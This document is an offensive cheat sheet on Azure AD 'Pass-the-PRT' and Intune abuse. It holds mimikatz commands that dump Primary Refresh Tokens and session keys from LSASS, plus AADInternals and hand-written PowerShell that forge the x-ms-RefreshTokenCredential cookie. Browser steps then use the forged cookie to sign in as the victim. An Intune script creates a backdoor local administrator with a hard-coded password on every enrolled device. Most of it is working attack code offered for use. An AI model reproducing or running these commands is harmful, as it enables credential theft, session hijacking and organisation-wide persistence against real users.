
Pass-the-PRT

Pass-the-Primary Refresh Token (PRT)

Steps

1) Extract PRT, Session Key (KeyValue), and Tenant ID

Run as local administrator on an Azure AD joined or hybrid joined device where the target user has signed in; sekurlsa::cloudap reads the CloudAP logon data from LSASS:

Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap" "exit"'

2) Extract Context Key, ClearKey, and Derived Key

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "dpapi::cloudapkd /keyvalue:<KEY VALUE> /unprotect" "exit"'

3) Request Access Token (Cookie) to All Applications

Import-Module .\AADInternals.psd1

# mimikatz prints the PRT as unpadded base64; restore the padding, then decode it
# into the raw refresh token that AADInternals expects
$tempPRT = '<PRT>'
while($tempPRT.Length % 4) {$tempPRT += "="}
$PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($tempPRT))
# ClearKey is printed as a hex string; turn it into bytes and base64-encode it for -SessionKey
$ClearKey = "<CLEARKEY>"
$SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
# -GetNonce fetches a fresh nonce from login.microsoftonline.com and embeds it in the signed cookie
New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce

4) Copy the value from the above command and use it with a web browser:

  • Open the browser in Incognito mode.

  • Go to https://login.microsoftonline.com/login.srf.

  • Press F12 (Chrome dev tools) -> Application -> Cookies

  • Clear all cookies and then add one named x-ms-RefreshTokenCredential for https://login.microsoftonline.com and set its value to that retrieved from AADInternals

  • Mark HTTPOnly and Secure for the cookie.

  • Visit https://login.microsoftonline.com/login.srf again, and access will be granted as the user.

  • Now, you can also access portal.azure.com.
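The following is an added example, not code from the original page or from AADInternals, that builds the x-ms-RefreshTokenCredential cookie by hand from the values mimikatz prints, so the steps above can be understood (and checked) without the cmdlet. It assumes the cookie format used by public tooling: the session key is run through an SP800-108 counter-mode KDF (HMAC-SHA256, label "AzureAD-SecureConversation", 24 random context bytes) to get the derived key, and the cookie is an HS256 JWT whose header carries the context and whose payload carries the refresh token and a server nonce obtained from the srv_challenge grant. The placeholder values and the function names are assumptions.

```powershell
# Added example: hand-rolled PRT cookie construction (assumed format, not AADInternals code).
# Run after steps 1 and 2; paste the mimikatz values into the placeholders at the bottom.

function ConvertFrom-HexString {
    param([Parameter(Mandatory)][string]$Hex)
    # "a1b2..." -> byte[]; split on every two characters and parse each pair
    [byte[]]( (($Hex -replace '\s', '') -split '(..)' -ne '') | ForEach-Object { [Convert]::ToByte($_, 16) } )
}

function ConvertTo-Base64Url {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    [Convert]::ToBase64String($Bytes).TrimEnd('=').Replace('+', '-').Replace('/', '_')
}

# SP800-108 KDF in counter mode, single iteration, HMAC-SHA256 (assumed layout):
#   K = HMAC(SessionKey, [i=1]_4 || Label || 0x00 || Context || [L=256]_4)
function Get-PrtDerivedKey {
    param(
        [Parameter(Mandatory)][byte[]]$SessionKey,
        [Parameter(Mandatory)][byte[]]$Context
    )
    $label    = [Text.Encoding]::ASCII.GetBytes('AzureAD-SecureConversation')
    $kdfInput = [byte[]]([byte[]](0, 0, 0, 1) + $label + [byte[]](0) + $Context + [byte[]](0, 0, 1, 0))
    $hmac = [System.Security.Cryptography.HMACSHA256]::new($SessionKey)
    try { $hmac.ComputeHash($kdfInput) } finally { $hmac.Dispose() }
}

function New-PrtCookie {
    param(
        [Parameter(Mandatory)][string]$RefreshToken,   # decoded PRT (refresh token string)
        [Parameter(Mandatory)][byte[]]$SessionKey,     # ClearKey bytes from dpapi::cloudapkd
        [Parameter(Mandatory)][string]$Nonce           # server nonce; the cookie is only valid with a fresh one
    )
    # Fresh context per cookie; the server recomputes the derived key from it
    $context = New-Object byte[] 24
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($context)
    $derived = Get-PrtDerivedKey -SessionKey $SessionKey -Context $context

    $header  = @{ alg = 'HS256'; ctx = [Convert]::ToBase64String($context) } | ConvertTo-Json -Compress
    $payload = @{ refresh_token = $RefreshToken; is_primary = 'true'; request_nonce = $Nonce } | ConvertTo-Json -Compress
    $signingInput = (ConvertTo-Base64Url ([Text.Encoding]::UTF8.GetBytes($header))) + '.' +
                    (ConvertTo-Base64Url ([Text.Encoding]::UTF8.GetBytes($payload)))

    $hmac = [System.Security.Cryptography.HMACSHA256]::new($derived)
    try { $sig = $hmac.ComputeHash([Text.Encoding]::ASCII.GetBytes($signingInput)) } finally { $hmac.Dispose() }
    "$signingInput.$(ConvertTo-Base64Url $sig)"
}

# --- usage with values copied from mimikatz (placeholders) ---
$prtB64 = '<PRT>'
while ($prtB64.Length % 4) { $prtB64 += '=' }
$prt        = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($prtB64))
$sessionKey = ConvertFrom-HexString '<CLEARKEY>'
# Nonce request (assumed endpoint/grant used by public tooling)
$nonce = (Invoke-RestMethod -Method Post -Uri 'https://login.microsoftonline.com/common/oauth2/token' `
            -Body @{ grant_type = 'srv_challenge' }).Nonce
New-PrtCookie -RefreshToken $prt -SessionKey $sessionKey -Nonce $nonce
```

The printed string is what goes into the x-ms-RefreshTokenCredential cookie in step 4. Because the nonce is bound into the signed payload, generate the cookie immediately before using it in the browser; a cookie built with an old nonce is rejected even though the PRT itself is still valid.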

Intune

In addition to passing PRT, a user with Global Administrator or Intune Administrator role can execute PowerShell scripts on an enrolled Windows device. The script runs with SYSTEM privileges on the device. Here are the steps involved:

1) Access the Intune portal (requires the Global Administrator or Intune Administrator role)

2) Check enrolled devices

Go to:

3) Execute powershell scripts

Go to Scripts and click on Add for Windows 10.

Create a new script and select a script, for example, adduser.ps1:

4) Configure script execution

Select Run script in 64-bit PowerShell Host.

On the assignment page, select "Add all users" and "Add all devices."
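Below is an added example of the kind of script the step above refers to; adduser.ps1 is only a placeholder name on the page, and this body is not the page's own code. It creates a local user and adds it to Administrators, which works on every assigned device because Intune runs the script as SYSTEM. The account name and password are assumptions.

```powershell
# Added example (not from the original page): adduser.ps1 body for the Intune "Scripts" step.
# Executes as NT AUTHORITY\SYSTEM on each assigned device.
$UserName = 'svc_intune'                                                   # assumption
$Password = ConvertTo-SecureString 'P@ssw0rd!2024' -AsPlainText -Force     # assumption

# Idempotent: the script may run again on re-enrolment or after a failed check-in
if (-not (Get-LocalUser -Name $UserName -ErrorAction SilentlyContinue)) {
    New-LocalUser -Name $UserName -Password $Password -PasswordNeverExpires -AccountNeverExpires | Out-Null
}

# S-1-5-32-544 is the built-in Administrators group on every localized Windows build,
# so resolving by SID avoids breaking on non-English systems
Add-LocalGroupMember -SID 'S-1-5-32-544' -Member $UserName -ErrorAction SilentlyContinue

# Intune stores the script output; leave something diagnosable
"Created $UserName as local admin on $env:COMPUTERNAME running as $(whoami)"
```

The "Run script in 64-bit PowerShell Host" setting matters here: the Microsoft.PowerShell.LocalAccounts module (Get-LocalUser, New-LocalUser, Add-LocalGroupMember) is not available in the 32-bit host on 64-bit Windows, so the script fails silently without it.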
